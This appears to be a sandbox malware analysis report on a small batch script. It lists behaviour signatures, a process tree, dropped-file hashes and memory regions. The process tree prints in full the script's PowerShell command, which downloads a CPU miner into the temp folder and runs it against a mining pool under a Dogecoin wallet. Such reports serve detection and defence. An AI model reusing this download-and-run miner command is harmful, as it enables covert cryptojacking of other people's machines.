b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1797s
max time network
1787s
platform
windows10-2004_x64
resource
win10v2004-20231222-de
resource tags

arch:x64arch:x86image:win10v2004-20231222-delocale:de-deos:windows10-2004-x64systemwindows
submitted
04/02/2024, 17:51

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	1056	powershell.exe
8	1056	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4828	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4828	cpuminer-sse2.exe
4828	cpuminer-sse2.exe
4828	cpuminer-sse2.exe
4828	cpuminer-sse2.exe
4828	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1056	powershell.exe
1056	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1056	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4980 wrote to memory of 1056	4980	cmd.exe	86
PID 4980 wrote to memory of 1056	4980	cmd.exe	86
PID 1056 wrote to memory of 3648	1056	powershell.exe	98
PID 1056 wrote to memory of 3648	1056	powershell.exe	98
PID 3648 wrote to memory of 4828	3648	cmd.exe	100
PID 3648 wrote to memory of 4828	3648	cmd.exe	100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1056
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3648
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4828

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uepj2drf.as5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
303KB

MD5
9bd2051f4c2baf44d569cef866785c15

SHA1
2178efede176a234d02937948d3f8942cdb56008

SHA256
0c53c7a7e144efd931a31d4be0b3a99bad81a25a8068168d1b3148b7df3cc748

SHA512
17eada9d0d581f9ce6f81ff30583a134a106602b29f62d0f943a014a7e69c7694ac3cf544d7bfa54fdc5c0f7e2db64fec66fc5cc556e40b758c54b9b5a863172

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
291KB

MD5
d4d986030b76d63ea803cf7a1fa6232d

SHA1
ae49381a523125e118ba3c240d96baac0ea0700c

SHA256
1c2d47d1e03777ea2dc4d0b54c697fd745b5f8040dad050cdf8018a2e7c212e7

SHA512
d1505269c9b09e757674745b02bfb8185b21a9b45efa983ed88deef7655a744ac6efa738646eeb0364d3cac8c2276a3b46746fae5217e7f788156c094c2ec8a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
344KB

MD5
f799203afd839ce857d7970ae33d9b47

SHA1
c869eb979aa9a5072b24a650f3f3bb7b8f096f63

SHA256
1dc04d177fd7892183fbe3da0b4b5e2052938429a5d589ee48c7c6fad2f8b4a6

SHA512
5847c079ca3327a530498f5f9953613f187febf027971511af8152b2f40a5472837a0c7dd6f22172aa15cdcba3a169f6c0c3ca778643cca376e4884f0c53b220

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
301KB

MD5
7edfe7413412ff105cabaf29e315917f

SHA1
57701d8886059a138cc194f56ceec41476c0974a

SHA256
6f85b7aa9193908d3484da0657b4a71f24c38732019fcc61baf047c08c4271e6

SHA512
1502c9c5c86caeecacd79a6f1745829f1ec2f8ffdc4264b8a3510cdfe0a39b37b281f5dd7b017b000638c4f772307847bcc5e4fc6b9a3c234c6ae20a90479546

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
237KB

MD5
95331273712294f4ec7efa72fa0ad716

SHA1
7a2bb6332436034756dda7505eb0cf67b553fa13

SHA256
403fae5329468486c25c764cfe80ebc478fab2313f43f622f2bcf703a61d2886

SHA512
9b25c4de50535e37f1010887bf735a826e5deabc0d1a10c25a6f4ff95c7a77cd307a3160b37c593ab2f6ffc0dd0db0f641d0eff47676becdef1654a04e73fd12

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
327KB

MD5
5048bc5a21291f0e7ca010a9a5b3bf30

SHA1
7e1636bbb518c185d0671242353e40be0a5f4d70

SHA256
625578fd6d31493f7ef346987bae698c2f8b4aaa1ad8f8b84f65e0fc8da94126

SHA512
e83c4207b3f7273f2f16e6438ed3b89b31e99c13bd36c50ca3ac5d9f649f77e51a003f56a02b910f1bc7fc7222a57d02149de6a7e96e3d0d28db7c35bee38150

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
379KB

MD5
6b1a28378a4d9ed2fd7c413a7cd41a41

SHA1
58b30008fe72424255927e9c1edc54596f43009c

SHA256
670df17c1866f96d58d9ba14a0abdef29b440d71e5afc617104f348c56e3ad95

SHA512
ed1b0c1841a94b4657d4b65d73b3c7d97504325880eb42bfe3784246eadd42c56838e279321afd0d9d27899057db89f6ff71ae480a44364120885e67a0d2a971

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
143KB

MD5
3f47da019d94417e3a434233953c96d4

SHA1
4bee8ee0a17eadb692f97d5c2daee5ae00bd4930

SHA256
6e6dd656b72f1c42440e933860b9118746213d88c23becef8e7c870dba672914

SHA512
b5db763c3ca6c3481f567469685bd4bd19231d582f83809df7c728896861a4c603bbcfadec30254e0e32fd30cfe618fc90e7618a93f79e3fb9838ae578270b78

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
192KB

MD5
81d11ed4f0bc71672182d9c0eb412dcf

SHA1
c6d39810e4635614edbcb21d61a236116422c54b

SHA256
ae2d86f92c2642daf9c3ed98c100df5940ffcee2c9218366946ec5b4b15fd6b4

SHA512
d3aba8eed403668f67a302761cb2713cf4ddeeb927fefb5b590e0a9c5f3f7e93e571ca4ba66602dd526a68106aa6d3e32b93917efeb21dd7fe670e0b7e58f0b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
239KB

MD5
1ea1fdd373e5c43b04d40efbd3fb09b1

SHA1
f206329e1f93f33a54df63d4a45a3af30bc81259

SHA256
44123b877e97c3ce36717b282e83ca6c3bf6326b590825b4db7da2036a72cd98

SHA512
4db2ffd0b5d86419d56167d7c9ce363aa222e59455f143d03f6356b39d435f2f594572c30b6a6d3f168d69e2a0ea550c5fd9fe8fa822487420cdc62012f72dc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
297KB

MD5
383cab0c4335bdab54ea9645ec70c5bc

SHA1
b262c7d9384e640275182e369b462e3531f5560f

SHA256
d4cf6962df1820819358240b83c044c587b7324f1f57902aba165a3fc1752feb

SHA512
2ddec518491d5e777a49e9ee9acc1c0a79e5399256f4c75f315614bd5e5a7422299453499b0fc89d864a08ee4ee1af01eba55d15a9676e2c6ea0572868d671ee

Download Submit
memory/1056-19-0x000002C9AE010000-0x000002C9AE020000-memory.dmp

Filesize
64KB

Download
memory/1056-59-0x00007FFE1BA10000-0x00007FFE1C4D1000-memory.dmp

Filesize
10.8MB

Download
memory/1056-21-0x000002C9AE000000-0x000002C9AE00A000-memory.dmp

Filesize
40KB

Download
memory/1056-20-0x000002C9AE100000-0x000002C9AE112000-memory.dmp

Filesize
72KB

Download
memory/1056-0-0x000002C9AE130000-0x000002C9AE1B6000-memory.dmp

Filesize
536KB

Download
memory/1056-17-0x00007FFE1BA10000-0x00007FFE1C4D1000-memory.dmp

Filesize
10.8MB

Download
memory/1056-16-0x000002C9AE0E0000-0x000002C9AE0F6000-memory.dmp

Filesize
88KB

Download
memory/1056-10-0x00007FFE1BA10000-0x00007FFE1C4D1000-memory.dmp

Filesize
10.8MB

Download
memory/1056-15-0x000002C9AEC80000-0x000002C9AED84000-memory.dmp

Filesize
1.0MB

Download
memory/1056-13-0x000002C995E80000-0x000002C995E90000-memory.dmp

Filesize
64KB

Download
memory/1056-14-0x000002C9AE010000-0x000002C9AE020000-memory.dmp

Filesize
64KB

Download
memory/1056-12-0x000002C9AE010000-0x000002C9AE020000-memory.dmp

Filesize
64KB

Download
memory/1056-11-0x000002C9ADFD0000-0x000002C9ADFF2000-memory.dmp

Filesize
136KB

Download
memory/4828-72-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4828-75-0x0000000052D10000-0x0000000052DA8000-memory.dmp

Filesize
608KB

Download
memory/4828-74-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4828-76-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4828-73-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4828-82-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4828-87-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4828-92-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4828-97-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4828-102-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4828-107-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4828-112-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4828-117-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4828-122-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4828-132-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download